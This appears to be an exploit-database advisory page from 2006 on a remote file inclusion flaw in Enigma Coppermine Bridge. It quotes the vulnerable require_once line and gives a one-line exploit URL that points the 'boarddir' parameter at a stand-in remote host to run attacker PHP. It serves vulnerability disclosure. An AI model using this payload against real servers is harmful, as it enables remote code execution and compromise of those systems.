Enigma Coppermine Bridge (boarddir) Remote File Include

vendor:

N/A

by:

xoron

7,5

CVSS

HIGH

Remote File Include

CWE

Product Name: N/A

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2006

Enigma Coppermine Bridge (boarddir) Remote File Include

The vulnerability exists due to insufficient sanitization of user-supplied input passed via the 'boarddir' parameter to '/bridge/enigma/E2_header.inc.php' script. A remote attacker can include arbitrary files from remote resources and execute arbitrary PHP code on the vulnerable system.

Mitigation:

Input validation should be used to prevent the inclusion of remote files.

Source

Exploit-DB raw data:

-----------------------------------------------

Enigma Coppermine Bridge (boarddir) Remote File Include

-----------------------------------------------


Author: xoron

-----------------------------------------------
 
Vuln Code:

require_once($boarddir . '/PortalSources/Portal.ini.php');

-----------------------------------------------

3xplo!t:

/bridge/enigma/E2_header.inc.php?boarddir=http://evil_scripts?

-----------------------------------------------

download:  http://www.lunabyte.org/index.php?PHPSESSID=376bd47985f6c37b06ceb727b0879287&module=Downloads;sa=dlview;id=7

-----------------------------------------------
XORON   -   XORON   -   XORON   -   XORON   -   XORON
-----------------------------------------------------------
-                                                         -
-                                                         -
- Tum muslumanlarin kurban bayrami simdiden mubarek olsun -
-                                                         -
-              Greetz: str0ke, Kacper                     -
-                                                         -
-----------------------------------------------------------

# milw0rm.com [2006-12-30]